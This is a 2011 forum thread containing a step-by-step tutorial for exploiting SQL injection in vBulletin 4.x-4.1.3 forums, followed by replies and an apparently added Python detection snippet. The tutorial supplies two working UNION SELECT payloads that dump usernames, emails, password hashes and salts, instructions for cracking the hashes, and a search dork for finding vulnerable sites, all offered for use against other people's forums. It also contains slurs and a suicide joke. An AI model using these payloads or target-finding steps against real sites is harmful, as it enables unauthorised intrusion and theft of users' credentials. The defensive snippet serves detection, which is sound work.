Post: *TUTE* Hacking VBulletin 4.x-4.1.3
08-14-2011, 07:33 AM #1
How To Hack VBulletin Forums ver 4.x - 4.1.3

What you choose to do with this is up to you :: I did not create nor find this exploit on my own
I am only putting it into layman's terms since a lot of people don't understand injecting
This is a noob tutorial and assumes you have no prior knowledge of the exploit, or injection methods


Okay Ladies, shall we begin?

Part 1: The Beginning

First you are going to need some tools. You don't need to download any gay cracking/hacking software.
Just two little programs that anyone that is into web development should already have:

You must login or register to view this content. I use it for firefox cause I.E. is lame, and if you're using I.E. you should probably just You must login or register to view this content.
You must login or register to view this content. Another firefox add-on
Okay these both I think are for firefox so if you're using another browser (which you shouldn't be) then try to find a program that does the same as these.


Part 2: Is your mom asleep yet?

Now that you have made sure your parents are in bed, and you have installed the above software we need to find a site. What we are looking for is any VBulletin© <-- LoLz Site ver 4.x-4.1.3.
Once you have located your target you need to go to the community tab on the forum page, and then select groups (or just type in [url]www.yourvulnerablesite.com/group.php[/url]) *Note some sites
you will have to register to see their groups*. Okay so you have finally located the groups section, peeked out your door to make sure your mom was still asleep, and refilled your mountain dew.
Now locate an actual group:

So now I choose the chinese group, why you ask? I don't know...secretly no one really likes them, j/k no flaming it was a joke. Okay now the issue is, we need the actual group id, and we are not getting
it by hovering over the name of the group. This is where firebug comes in handy, now I know there are gagillion ways of doing this, but again I'm making this for the complete noob. What you want to do is
right click the group name "chinese", then click 'Inspect Element' on the pop-up dialog. Now what we are looking for is the line underneath the header for the group.

    <ul class="controls">
        <li>
            <a class="textcontrol" href="https://www.nextgenupdate.com/forums/group.php?groupid=1173&do=join" rel="nofollow">


You can see from the "ul class" that the groupid is 1173

Part 3: I Always Feel Like Somebody's Watching Me

Now that you have looked out of the crack in the blinds for the feds, and muted that Miley Cyrus song so you can listen for black helicopters we need to left click on the name of the group "chinese" and find a post that they have made. If no post exists for the group, find another group, or join that one and make a post. Once you see a post that they have made, or you have created note the title of the post/thread. Now we want to go to the search area of the forum, and click single search, then select Group Messages, and for Keywords copy and paste the thread title that you created in the group, or the one that the group had already created:

Now before you get all excited and bust one off in your scooby-doo tighties, we need to open up Live HTTP Headers, if there is a bunch of mumbo jumbo there we need to hit the clear button, once it's clear, go ahead and click back on the forum, and hit the search button, I know you have been waiting to do it ever since you typed in those keywords. Now click back on your Live HTTP Headers, and you will notice a $hit load of crap that is written in some form of alien technology that only a super elite nerd would understand. That's okay though, trust me, it's going to make sense in a second...**Warning Technical Content** This type of injection is a post injection, we are taking advantage of an error in the script of VBulletin and we are going to append some information to the search query, by posting an extra query to the database**
What you are looking for in the Live HTTP Headers section is the post area for the site you were on:

Now you may notice 2-3-1,000,000 different post sections but we want the one that says : query on the last line. Which is usually around the top part of Live HTTP Headers. Once you have located that select that row, and click the Replay button on Live HTTP Headers....woah woah woah...what's all this then? Well that's a good question, this is the query that was sent to retrieve the information we searched for, so what we are going to do is add our own little code (muhahaha) and then let it replay (muhahaha). Now that you have it open for editing in the replay mode do what you tricks do best and copy and pastah this code (note, I did not say "my code" as it's not my code, so stfu about it, we all get stuff from other sources).

    &messagegroupid[0]=YOURGROUPID ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt  ) FROM user WHERE userid=1#

Replace YOURGROUPID with the groupid we snagged earlier:
    &messagegroupid[0]=1773 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt  ) FROM user WHERE userid=1#


That's it, we just paste that at the end of the replay and hit the replay button:

When you paste in your code, and change out the groupid with the proper id, and hit replay, you will notice the page reload, and next to your search result will be the user name/email/pass/salt .. you can change the userid=1# to whatever user you want to h4x0r i.e. userid=1234# etc.

A few notes :
1. Some sites have not indexed their search tables properly, and you will not be able to use this method *cough* ngu *cough*
2. You have to yield a proper search result for this to work, not a generic page full of possible results. You will notice the search is broken by looking at your keywords used in your search, for this example I will use NGU and search for a post and you will see the EPiC FAiL :

Now judging by that post, you would think that I'm some flamer looking for "guys" on here, when in fact the actual search keywords were "Come on guys".

3. If you run into these issues don't give up on h4x1n and run back to play Ecco on your sega genesis just yet, there is still hope.

Part 4: All By Myself

Now that you have eaten a bottle of pills and chased them with that drain-o under the kitchen sink because you have EPiCally FAiLed at h4x0r1ng we need to act fast because you don't have much time. So put on your favorite Celine Dion album and listen up. What you want to do, is find another user group, note their name, then run over to the search box, and do a search. This time we want to do the "Multiple Content Types" search, and tick the box for Groups, then for the keyword, put in your group's name. Now repeat the process of opening up Live HTTP Headers, and clearing out any data that is there, then hit the search button on the forum. Now you can bring up your Live HTTP Headers again and find the appropriate post field, and hit replay. Once you are in replay mode, append this code to the end of the post:

    &cat[0]=1) UNION SELECT concat_ws(0x3a,username,password,salt,email) FROM user limit 1,1#


Again we can change out the limit 1,1 to however many users we want to h4x0r.

What Can I Do With Hash(s) and Salt(s)?

Okay you can visit your favorite place to get software and look for passwordspro, then you can add the hash and salt to be cracked and select the md5(md5($pass).($salt)) option *not sure about the context there, feel free to flame me on that one*, then select the type of attack you want to do i.e. bruteforce etc etc. There is a settings menu that lets you adjust the variables for each attack type against the password. That is just one of 1,000's of ways of cracking the password, so feel free to google away on how to crack vbulletin hashes.

Final Thoughts: The moment of truth

Okay guys, this is what I have learned from various sources, too many to quote. No one has compiled a tute like this that I have been able to find. I don't want to hear about how you googled certain content from my post and found a piece here or a piece there. All I can reply to that is "no $hit" it's going to happen, as I did not create nor find this exploit, some 7 yr old in asia found it I'm sure. If you need further help executing this exploit successfully please feel free to PM me. I will not provide help here, as I don't babysit my threads. I hope you guys enjoyed my PERSONAL tute on how to work out this exploit. I tried to make it as basic as possible but I know that some will still have some difficulty with it, and that's fine, I'm here to help.

Flamers, trolls, keep moving past this one, it's not for you. Let's try to keep at least one thread clean from some a$$hole that has nothing better to do than point out this or that instead of taking his 1337 a$$ to the forums and creating his own helpful thread.

Thanks again,
And Remember,
RalphieRocks

*Side Note*

You can use a google dork to find vulnerable sites, basically search google for " Powered by vBulletin 4.1.3 " or something like that, and you can find what you're looking for.
And yes, you can try out your own injection techniques here, it's not limited to the two different examples I showed you, be creative and see what you can fetch.
The second example uses a different injection string, as you can clearly see, you are free to research these and edit them to fit your needs, and vBulletin's setup.

Here is a YouTube Vid for those still having trouble with this one:


If you're having issues with fetching the wrong data from the database, then you really need to google union selecting, and vbulletin databases. I cannot do everything, this is just to help get your foot in the door.

The following 3 users say thank you to ralphierocks for this useful post:

Correy, Domov, Mr. Bean
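
From the defender's side, both injection strings in the tutorial above arrive in array parameters (`messagegroupid[0]`, `cat[0]`) that should hold only numeric IDs. The following is an added example, not part of the original post and not vBulletin's code: it flags search POST bodies where those parameters carry anything other than a plain integer, and shows integer-only filtering. The function names and the sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Parameter names taken from the tutorial; assumption: they only ever carry
# numeric IDs (as with groupid=1173 on the page).
ID_ARRAY = re.compile(r"(messagegroupid|cat)\[\d*\]")
DIGITS = re.compile(r"[0-9]{1,10}")  # ASCII digits only; str.isdigit() is looser


def suspicious_params(post_body):
    """Return (name, value) pairs whose ID-array value is not a plain integer."""
    hits = []
    # parse_qsl URL-decodes names and values, so %5B0%5D, %20 and + are
    # normalised before the check and encoding tricks do not hide the payload.
    for name, value in parse_qsl(post_body, keep_blank_values=True):
        if ID_ARRAY.fullmatch(name) and not DIGITS.fullmatch(value):
            hits.append((name, value))
    return hits


def sanitize_ids(values):
    """Server-side filter sketch: keep only plain integers, returned as ints."""
    return [int(v) for v in values if DIGITS.fullmatch(v)]


def scan(bodies):
    """Map sample index -> offending parameters, for bodies that have any."""
    found = {}
    for i, body in enumerate(bodies):
        hits = suspicious_params(body)
        if hits:
            found[i] = hits
    return found


# Constructed sample POST bodies (not captured traffic)
SAMPLES = [
    "query=come+on+guys&titleonly=0&messagegroupid[0]=1173",
    "query=come+on+guys&messagegroupid%5B0%5D=1173+%29+UNION+SELECT+1%23",
    "query=chinese&cat[0]=1)%20UNION%20SELECT%201%23",
    "query=union+select+tutorial&cat[]=4",  # SQL words in free text: not flagged
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLES).items():
        print(f"sample {idx}: {hits}")
```

Checking the parameter's type rather than grepping for SQL keywords keeps a legitimate search for "union select tutorial" from raising an alert while still catching both payload shapes.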
10-10-2011, 09:06 PM #11
Thanks for sharing great stuff.
But let me ask, how can I reverse this to protect myself so I don't get intruders in my forum.... ?
Please I will need this as I already have an intruder in my forum and I would like to feel a bit more secure blocking him from many accesses......
10-11-2011, 06:35 AM #12
I will donate $35 to whoever teaches me how to protect my forum from hackers on msn or anything if it needs to be private as I already have one in the forum and he can log in as any user including me.

---------- Post added at 02:35 AM ---------- Previous post was at 12:15 AM ----------

I can't send PMs yet due to the 10 post limit. I will put it here and you can send me a PM with contact info if you like.

Is security wise
I have a problem on my forum: a friend of mine is one of the best vB hackers I have ever heard of, as he belongs to a big group of hackers from the past. He has access to my forum, which is annoying, seeing him do whatever the heck he wants.

I have changed servers with a new install, same with the domain. I have added htaccess with password protection on the admin folder, same on the Mods folder, but he still gets past it and even has the guts to tell me what the password was. He can log in as me or any other mod. The truth is that he doesn't damage the board, but it is very annoying to see someone have access where you really don't want him to, and I think it is disrespectful on his part.

What I want is to make the forum as secure as it can be against hackers getting access to the forum or server, etc...
10-11-2011, 08:02 PM #13
fill0botto95
You talkin to me?
how much you will have to pay if they know you're using a vB cracked?
10-12-2011, 01:41 AM #14
GBish
Banned
Old tutorial, I believe I even had a tut like this :$
10-12-2011, 03:28 AM #15
LOL @ the people hating on the OP, they're probably just mad cause they tried and failed. :lol:
10-13-2011, 01:54 AM #16
Originally posted by usa View Post
There is no such thing as 100% safe. If you come across a hacker that knows exactly what he is doing then he is unstoppable. The most you can do is change your admin folder name, secure your htaccess, and make minor changes. Normally hackers will use an SQL Injection to break into your forum. When a hacker does an SQL Injection on your forum they are looking for "weak" or "error" coding in your files to gain access to your SQL. They then send false commands to get an MD5 Hash back, which in turn they use a decoder to get a user's password.
10-13-2011, 12:56 PM #17
Ada Wong
So cute!
Originally posted by usa View Post
1. Beat him in REAL life (if you have one )
2. Buy an anti-virus ( you have key loggers trust me )
3. Make a new site and don't tell him the name
4. Go Cry and say if you get in ma account again i Tell my mom
10-13-2011, 01:53 PM #18
Originally posted by fill0botto95 View Post
how much you will have to pay if they know you're using a vB cracked?


My vB is not nulled, it is licensed

Copyright © 2026, NextGenUpdate.
All Rights Reserved.